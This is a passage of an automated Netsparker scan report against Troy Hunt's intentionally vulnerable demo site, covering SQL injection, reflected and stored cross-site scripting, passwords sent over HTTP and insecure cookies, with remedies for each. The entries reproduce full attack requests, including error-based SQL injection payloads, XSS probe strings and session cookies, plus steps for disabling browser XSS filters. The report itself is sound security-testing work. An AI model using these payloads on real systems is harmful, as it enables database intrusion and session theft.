External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
